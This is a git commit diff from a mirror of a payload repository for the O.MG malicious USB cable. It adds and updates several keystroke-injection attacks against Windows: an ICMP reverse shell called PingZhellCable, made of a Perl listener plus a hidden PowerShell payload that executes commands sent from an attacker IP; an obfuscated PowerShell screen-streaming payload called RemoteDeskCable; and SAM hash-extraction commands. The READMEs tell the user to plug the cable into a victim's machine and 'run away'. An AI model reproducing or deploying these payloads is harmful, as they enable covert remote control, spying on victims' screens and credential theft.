mirror of https://github.com/hak5/omg-payloads.git
commit
9fb4ac8297
|
@ -17,7 +17,10 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
|||
|
||||
2. Plug in your cable and wait a few seconds
|
||||
|
||||
3. Use a tool like samdump2 on your machine to extract the users hashes.
|
||||
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
|
||||
> `samdump2 1337OMGsys 1337OMGsam`
|
||||
or `pypykatz registry 1337OMGsys --sam 1337OMGsam`
|
||||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
|
|
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env perl
|
||||
#
|
||||
# icmpsh - simple icmp command shell
|
||||
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
||||
# This program is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellCable
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use IO::Socket;
|
||||
use NetPacket::IP;
|
||||
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
|
||||
use Net::RawIP;
|
||||
use Fcntl;
|
||||
|
||||
print "Loading PingZhellCable...\n";
|
||||
|
||||
# create raw socket
|
||||
my $sock = IO::Socket::INET->new(
|
||||
Proto => "ICMP",
|
||||
Type => SOCK_RAW,
|
||||
Blocking => 1) or die "$!";
|
||||
|
||||
# set stdin to non-blocking
|
||||
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
|
||||
|
||||
|
||||
#Unnecessary print output - just for fun
|
||||
sleep(2);
|
||||
print ". .\n";
|
||||
sleep(1);
|
||||
print ". . .";
|
||||
sleep(1);
|
||||
print ". . . .";
|
||||
sleep(2);
|
||||
print "PingZhellCable client ready!\n";
|
||||
my $input = '';
|
||||
while(1) {
|
||||
if ($sock->recv(my $buffer, 4096, 0)) {
|
||||
my $ip = NetPacket::IP->decode($buffer);
|
||||
my $icmp = NetPacket::ICMP->decode($ip->{data});
|
||||
if ($icmp->{type} == ICMP_ECHO) {
|
||||
# get identifier and sequencenumber
|
||||
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
|
||||
|
||||
# write data to stdout and read from stdin
|
||||
print $data;
|
||||
$input = <STDIN>;
|
||||
|
||||
# compile and send response
|
||||
$icmp->{type} = ICMP_ECHOREPLY;
|
||||
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
|
||||
my $raw = $icmp->encode();
|
||||
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
|
||||
$sock->send($raw, 0, $addr) or die "$!\n";
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,43 @@
|
|||
**Title: PingZhellCable**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.1<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
|
||||
**What is PingZhellCable?**
|
||||
#
|
||||
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
|
||||
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
|
||||
*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
|
||||
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
|
||||
*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
|
||||
*The server ICMP agent (PingZhellClient.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellCable input) and sends it commands to execute.*
|
||||
#
|
||||
There you go, a reverse shell without the usage of ports.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Upload PingZhellClient.pl onto your attacking machine.
|
||||
Install dependencies, if needed:
|
||||
- IO::Socket
|
||||
- NetPacket::IP
|
||||
- NetPacket::ICMP
|
||||
|
||||
Disable ICMP replies by the OS:
|
||||
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
|
||||
|
||||
Start the client -> `perl PingZhellClient.pl`
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/PingZhellCable/setup.png)
|
||||
|
||||
<p>!!!Insert the IP of your attacking machine into the payload variable $IP!!!<br>
|
||||
|
||||
<p>Plug in your OMG device.<br>
|
||||
Achieve reverse shell.<br>
|
||||
run away <3</p>
|
||||
|
||||
|
||||
Credit for code and ideas:
|
||||
- bdamele
|
||||
- Nikhil Mittal
|
||||
- krabelize
|
|
@ -0,0 +1,24 @@
|
|||
REM PingZhellCable
|
||||
REM Version 1.1
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.2.5 or higher
|
||||
|
||||
REM Getting remote access via ICMP
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -w hidden
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $IP = 'Attacker-IP';
|
||||
DELAY 250
|
||||
STRING $Delay=5;$BufferSize=128;$ICMPCable=New-Object System.Net.NetworkInformation.Ping;$PingOMG=New-Object System.Net.NetworkInformation.PingOptions;$PingOMG.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('O.MG@PS '+(gl).Path+'> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;
|
||||
DELAY 250
|
||||
STRING if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null;$i +=1;};$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null}}else{$ICMPCable.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null}else{Start-Sleep -Seconds $Delay}}
|
||||
DELAY 250
|
||||
ENTER
|
Binary file not shown.
After Width: | Height: | Size: 34 KiB |
|
@ -1,12 +1,13 @@
|
|||
**Title: RemoteDeskCable**
|
||||
|
||||
Author: 0iphor13
|
||||
|
||||
Version: 1.0
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows<br>
|
||||
Version: 2.1<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
|
||||
What is RemoteDeskCable?
|
||||
#
|
||||
*The O.MG Cable is a powerfull tool and can be used as a remote HID, to even increase the power, RemoteDeskCable was released. - Get screen access!*
|
||||
*The O.MG devices are powerfull tools and can be used as a remote HID, to even increase the power, RemoteDeskCable was released. - Get screen access!*
|
||||
*See what your victim is doing, see when the time is right to fire up your next payload!*
|
||||
#
|
||||
|
||||
|
@ -14,10 +15,10 @@ What is RemoteDeskCable?
|
|||
|
||||
!!!Insert the IP of your attacking machine & PORT into the payload!!!
|
||||
#
|
||||
Plug in Cable.
|
||||
Start netcat on your attacking machine like so: nc -lvnp 1234 | nc -lvnp 5678 (Example Ports) This will create a relay towards your second port.
|
||||
Start netcat on your attacking machine like so: `nc -lvnp 1234 | nc -lvnp 5678` (Example Ports) This will create a relay towards your second port.
|
||||
Plug in your Cable/Plug/Adapter - run away
|
||||
#
|
||||
Use a browser supporting MJPEG, like FireFox, and visit 127.0.0.1:5678.
|
||||
Fire up the payload and for the screenshare to appear within FireFox.
|
||||
Fire up the payload for the screenshare to appear within FireFox.
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/RemoteDeskCable/Screenshot%20from%202022-01-16%2013-28-28.png)
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/RemoteDeskCable/Screenshot%20from%202022-01-16%2013-29-03.png)
|
||||
|
|
|
@ -1,51 +1,18 @@
|
|||
DELAY 200
|
||||
REM RemoteDeskCable
|
||||
REM Version 2.1
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Description: Getting remote screen access to view your targets actions
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
|
||||
DELAY 2000
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRING powershell -NoP -NonI -W hidden
|
||||
DELAY 300
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -w hidden
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 300
|
||||
|
||||
DELAY 200
|
||||
STRING $IPADDress='0.0.0.0';$Port=1234;(NEW-oBjeCt SySteM.io.coMPreSsIon.deFlAtEStReam( [syStEm.IO.meMoRYsTrEA
|
||||
DELAY 300
|
||||
STRING m] [sysTeM.coNVeRt]::fRoMbaSE64STRinG( 'pVdtb9pIEP7eX7HHoUJ02CHtfcopHwhxE5TyIuxrVKHo1tgT7AZ73d2l1EX+7zezBhJiJ+ldk
|
||||
DELAY 300
|
||||
STRING cBOPK/7zDwzfttubN4Vm26xOSka1l0rDFudluXlGeC11zpiVk8pSObLfOQnwNxcaUjsmzgNxVrZH4RM1Bv26DPbSgzG9hASIXNXS/CTW9bcJE4y5t
|
||||
DELAY 300
|
||||
STRING PPSk8d3hsW7Iy9feycWXesBQG61fgdwdoaz79gAPUG3xx4pU9z4wre5/eO3plGu+8eTO8slvbR0d70CLTtiuAetNpeWXtW86wXhhKU+uAn8TK/PT0
|
||||
DELAY 300
|
||||
STRING dpBokCqyFvO+wOo3ySqeJ4mXg9YITKbQIxHIr6gXZUU2Cio/LBO2+SFMIdLu5GWS9i1By4K5bdJqbjIupVxwq363SQMciZS6k4RRUJlIFqKrGPLgu
|
||||
DELAY 300
|
||||
STRING OnRy3nTAR5dP9DaVEOI7hnouF/37fQwQVkOtapYJnOfcc1zX4SOPQCJTYwzBpsDaz+hgvfCYjxZF1c0uJJSa59rhyuUwQvgt+MqsE1avUB8bfahmT
|
||||
DELAY 300
|
||||
STRING optRb6ndmCtDGvlBr8y1mCNV1Q6+HPEGhQyu/PjJYRMC9Zgf5h0BKUzxULV4KThRMSprvVXVP57+J/ieQSxjh6B6I55fwuilnRQP4uiQhSv/x+Knx
|
||||
DELAY 300
|
||||
STRING FFPGsn3aNoTD2P4kzDd207aSDCOF1ggfdUEMf2JejzXIOiaDw5MCC/hjJ3FHed9NdQ3jMDQXwjY4NqZtAlmBHfdj3AZcs8Abg+gl9A+Ar8EGT1KGcp
|
||||
DELAY 300
|
||||
STRING UobaUkZ5vS2biEqghjCWHFtt4V3VPnS51+PeSvXHPHQIyMa7bpeNrxt1wkM+4EMncvwLRxZnDcLzONLJslb4SusJ/+RMXVQSIxS/8rzJ8Yl90qgIv1
|
||||
DELAY 300
|
||||
STRING arzc2UO+6Ej1NE3QS5s8WaSvsawxchcMlTBKii3cDq1pBqM9BOWbJa6jjzpT7+biXxdwgtCdnSD+AvNherNPRlfmZZu1syimYrRu2SJt4XZRnRdGll
|
||||
DELAY 300
|
||||
STRING AkunbE68wc4kysAuxUoytB3cF5SK4yI/85FyqsXxUJZo+M/dOMbaJIPCGATrk7GL3zlRUFkmTGGCVKHNwWQ7oRovFNrvpq51BCwy6gcP7cPeoIzIL3
|
||||
DELAY 300
|
||||
STRING k0RWnSMfTPcQodqK4j7BTiFY9P/3Ze5SDsZUJz69CwLjkcUYJrC39wVCMtPQzpC+mvkTvs81gnfrafzwebiO0GEiBFfpnIOEEIy7/tc0JUoWyoo4f
|
||||
DELAY 300
|
||||
STRING 5+19UryBeRDWN3txcUhqzJ0FeSj+L4kChuQ9SJIPEXxBXz2tmWHOzIBLOchIsnbbbTxej1pO1CKrnYpio3e10j446rG1XNqtSrdMKtmZesYAsj4Qe/4
|
||||
DELAY 300
|
||||
STRING D6nO2LGCcQDqC6x0MnEbjocRdLAXDTw8GgP0K60FG7Wyc/Rwn/Gx3QEIa44SmOipw0MZOZKqMMt1EiOIvdFe4QOl/jKX/JYFEzOoztl0L9CHzEL5Eg
|
||||
DELAY 300
|
||||
STRING zRxLIOHjae6Sf6eXFHYZdZWHcQ7B7Ja495znuNFs1c2Ci+FS9D7m7YmelH5e6xmTlIbPiGQekc7P8JjJ/ZhyfkW8jP+UNZfmpp7PSkaYwtcVKK1qiWnHdb
|
||||
DELAY 300
|
||||
STRING uRSVuRoSSR7nlvT3e40/JrDl5Rzhj5EtftqpNM7GyWy82eavi1Y0zNOR66+9IMpcrj+IrAc45+SwT7y0Potztet2yriBrC1/gusBfYVAjx5DHRyzSmlG/M
|
||||
DELAY 300
|
||||
STRING Pnjj4+3CbIMiAR1hXbI1sfFainTxG+tHENzT7kJ0q0B+Q7aOFcPXgCDy50iXPh58LlbMl8BWitRJMhBSIvexTEhtN1glIHNulIJ5Y7IcKQUxtJkUN9Ic3D
|
||||
DELAY 300
|
||||
STRING 8PJ1O8+Rc='), [iO.cOMprEsSIOn.COMPreSSiONMoDE]::DECOmPRESS ) | fOReaCh{NEW-oBjeCt SysTEM.iO.sTREaMREaDEr( $_, [sYStE
|
||||
DELAY 300
|
||||
STRING M.tExt.ENcOdInG]::ASCIi )} |FOReAch{$_.rEADtOEnD()}) | & ((get-vArIaBLe '*mDr*').Name[3,11,2]-Join'')
|
||||
DELAY 300
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $IPADDress='ATTACKER-IP';$Port=1234;$bGPy0=")''NIOj-]52,42,4[cepsMOc:VNe$ (& |)63]RAHc[,)601]RAHc[+901]RAHc[+511]RAHc[( ECalPerc- 69]RAHc[,)47]RAHc[+55]RAHc[+78]RAHc[( ecAlpEr-43]RAHc[,'gIx' ECalPerc- )')(eso'+'lC.SMjms}setyBjms tksj'+'ms esnopseRdneS;rtsjms tksjms esn'+'opseRrtSdneS;gIxnJ7WnJ7Whtgneljms :htgneL-tnetnoCgIx + gIxnJ7Wgepj/egami :epyT-tnetnoCgIx + gIxnJ7Wyradnuob--nJ7WnJ7WgIx = rtsjms;)(yarrAoT.SMjms = setyBjms ]][etyb[;htgneL.SMjms = htgneljms;)(esopsiD.bjms;))gepj::]tamrofegami.gnigami.gniward.met'+'sys[( ,SMjms(evaS.'+'bjms;)0(htgn'+'eLteS.SMjms;)(esopsiD.gjms;)eziS.bjms'+' ,))0,'+'0'+'(tnioP'+'.gniwarD.metsyS tcejbO-weN( ,))0,0'+'(tnioP.gniwarD.metsyS tc'+'ejbO-weN((neercSmorFypoC.gjms;)bjms(eg'+'amImorF::]scihparG.gniwarD.metsyS[ = gjms;)thgieH'+'.sdn'+'uoB.neercSy'+'ramirP::]neercS.smroF.swodniW.metsyS[ ,htdiW.sdnuoB.neercSyramirP::]neerc'+'S.'+'smroF.swodniW.metsyS[(pamtiB.gniwarD.metsyS tcejbO-weN = bjms{)eurTjms( '+'elihw;tksjm'+'s redaeHdneS}serjms ksjms esnopse'+'RrtSdne'+'S;gIxnJ7WnJ7WrJ7Wyra'+'dnuob--=yradnuob ;ecalper-dexim-x/trapitlum :epyT-tnetnoCgIx + gIxnJ7WrJ7Woc'+'tsjms 1.1/PTTHgIx = serjms{)gIx1.1/PTTHg'+'Ix='+'ptthjms,gIxlmth/txetgIx=daehjms,gIxKO 002gIx = octsjms,htgneljms,ksjms ]tek'+'cos.stekcos.ten[(redaeHdneS noitcnuf}}))gnirtsjms'+'(setyBteG.i'+'icsA::]gnidocnE.txet[(dneS.ksjms ='+' stbjms{)detcennoC.ksjms( fi{)gnirtsj'+'ms ,ksjm'+'s(esnopseRrtSdneS noitcnu'+'f}})gnirtsjms(dneS.ksj'+'ms = stbjms{)detcennoC.ksjms( fi{)gnirtsjms ,ksjms(esnopseRdneS'+' noitcnuf;)troPjms,sserddAPIjms(tcennoC.tksjms;)pcT::]epyTlocotorP.ste'+'kcoS.teN.metsyS[ ,maertS::]epyTt'+'ekcoS.stekcoS.teN.m'+'etsyS[ ,krowteNretnI::]ylimaFsserddA.ste'+'kcoS.teN.metsyS[( tekcoS.stekcoS'+'.teN.metsyS tcejbO-weN = tksjms;maertSyrom'+'e'+'M.OI.metsyS t'+'cejbO-weN = SMjms'+' ]maertSy'+'romeM.OI.metsyS[;smroF.swodniW.metsyS emaNylb'+'messA- epyT-ddA'(( "; . ( $enV:cOMspEc[4,15,25]-joIn'') ( "$(SEt-item 'vaRIaBLE:oFs' '' )"+ [sTriNG]( ( vaRIABlE BgpY0 -VAl )[ - 1..- ( ( vaRIABlE BgpY0 -VAl ).LENgTh) ] )+"$(seT-VARiABLe 'oFS' ' ')")
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
|
Loading…
Reference in New Issue